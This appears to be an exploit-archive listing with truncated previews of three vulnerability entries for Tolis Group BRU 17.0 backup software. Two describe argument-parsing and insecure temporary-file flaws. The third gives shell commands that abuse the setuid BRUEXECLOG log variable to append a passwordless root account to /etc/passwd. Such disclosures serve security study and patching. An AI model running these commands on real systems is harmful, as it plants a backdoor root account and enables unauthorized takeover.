Tolis Group BRU 17.0 - Local Privilege Escalation (2)

Tolis Group BRU 17.0 - Local Privilege Escalation 2 // source: https://www.securityfocus.com/bid/8215/info It has been reported that BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct...

BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link

// source: https://www.securityfocus.com/bid/3970/info BRU is a commercially available backup software infrastructure available for both UNIX and Linux Operating Systems. It is distributed and maintained by the Tolis Group. When BRU executes, it creates temporary files insecurely. BRU uses easily...

BRU Vulnerability

BRU backup software Vulnerability: Description: You can change the log file BRU uses by changing the BRUEXECLOG environment variable. Since bru is setuid root you can append to any file on the system. Exploitation: $ BRUEXECLOG=/etc/passwd $ export BRUEXECLOG $ bru -V ' comsec::0:0::/:/bin/sh ' $...